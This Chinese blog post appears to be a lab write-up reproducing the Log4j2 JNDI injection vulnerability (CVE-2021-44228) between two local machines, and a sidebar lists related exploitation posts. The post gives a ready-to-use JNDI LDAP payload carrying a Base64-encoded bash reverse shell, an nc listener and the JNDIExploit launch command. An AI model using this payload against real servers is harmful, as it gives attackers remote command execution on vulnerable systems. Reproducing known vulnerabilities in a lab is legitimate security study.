log4j2复现试验

最新推荐文章于 2024-04-29 21:21:45 发布
最新推荐文章于 2024-04-29 21:21:45 发布
阅读量2.1k 收藏 1
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121928860
版权

之前bugku有一题是log4j2的复现,然后看到网上一个本地复现的帖子,那就拿这个帖子来做一个简单验证
原文地址:https://bbs.wxctf.com/thread-622-1-1.html
只有两台机器:
受害机ip:192.168.200.132:38080
攻击机:192.168.200.128(burpsuite,jndiexploit,nc)
环境docker拉一下,访问192.168.200.132:38080看见error页面就说明起起来了
说一下可能出错的地方,不要图省事,将docker也拉到kali上,因为docker做了一个端口映射,其实他也用的8080端口
burp,jndiexploit,docker三个都映射到8080端口,不打架才怪
我把docker放在受害机上了
然后把burp的监听端口改成80了,这样就只有jndiexploit一个在用8080,那就不会出错了,ok!
那么就好了
payload=${jndi:ldap://192.168.200.128:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMjgvNjY2NiAwPiYx}
nc -lvvp 6666
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.200.128
拿到shell,复现完毕
参考视频链接:https://www.bilibili.com/video/BV14Y411W7Dh/

显哥无敌
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效,非常好用老版的BurpSuite和新版的都可以使用。祝大家挖洞顺利(工具仅用于学习交流)
log4j2问题
weixin_44676079的博客
12-14 205
log4j2BUG
VULHUBlog4j反序列化漏洞-CVE-2021-44228
最新发布
carrot11223的博客
04-29 1094
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
Log4j2简单-前期
weixin_44844556的博客
12-20 1640
Log4j2log4j、log2
log4j2(小宇特详解)
小宇的web博客
02-19 771
log4j2(小宇特详解) 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 log4j2是调用了jndi来查询一些信息然后记录到了日志里面。 jndi是java一套资源和使用的接口,用来将各种资源做整合 idap是一种文件访问协议,用来获取文件资源 rmi是远程方法执行,是RPC的纯java实
Log4j2 与基础原理
weixin_45751765的博客
01-17 1439
0x00 实操 因为是java小白,所以先照着文章了 环境搭建 docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker exec -it log4j_vuln_container /bin/
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
Log4j2Scanner
02-23
Log4j2-Scan
log4j2
weixin_65219040的博客
06-18 479
目录环境搭建log4j2 DNSLog测试JNDI注入反弹shell 靶机:Ubuntu 5.4.0-117-generic   192.168.6.183 攻击机:Kali 5.16.0-kali7-amd64 192.168.6.212 靶机: #首先拉一个docker镜像 docker pull vulfocus/vulfocus #查看镜像 docker images #启动 docker run -d -p 8081:80 -v /var/run/docker.sock:/var
bugku---Apache Log4j2 RCE
weixin_43895765的博客
12-15 4598
1.bugku---Apache Log4j2 RCE 1.1 打开题目 注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用 1.2 构建一个JNDI服务 Github: https://github.com/welk1n/JNDI-Injection-Exploit 1.2.1 构建 1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-Exploit
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3565
Log4j CTFshow 参考文档1 参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4375
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
【漏洞】log4j2远程执行代码实操代码例子
肉段_Dxd的博客
12-11 4305
关于近日log4j漏洞导致的远程执行代码的例子,利用JNDI的ldap攻击,使远程服务可能执行了恶意代码
log4j2 burp插件-Log4j2Scan(二)
siu~
03-14 1907
该工具为被动扫描Log4j2漏洞`CVE-2021-44228`的BurpSuite插件,具有多DNSLog(后端)平台支持,支持异步并发检测、内网检测、延迟检测等功能。
Apache Log4j2漏洞
MoCoCN的博客
12-22 2913
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
Log4j2远程代码执行漏洞本地
CleanMe的博客
12-12 5412
Log4j2远程代码执行漏洞本地
log4j2漏洞在线
10-05
要在线log4j2漏洞,您可以按照以下步骤进行操作: 1. 编写一个Java类,包含恶意代码,例如上述提供的POC。 2. 确保您的Java环境中安装了受漏洞影响的log4j2版本。 3. 运行该Java类,并触发日志记录操作。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值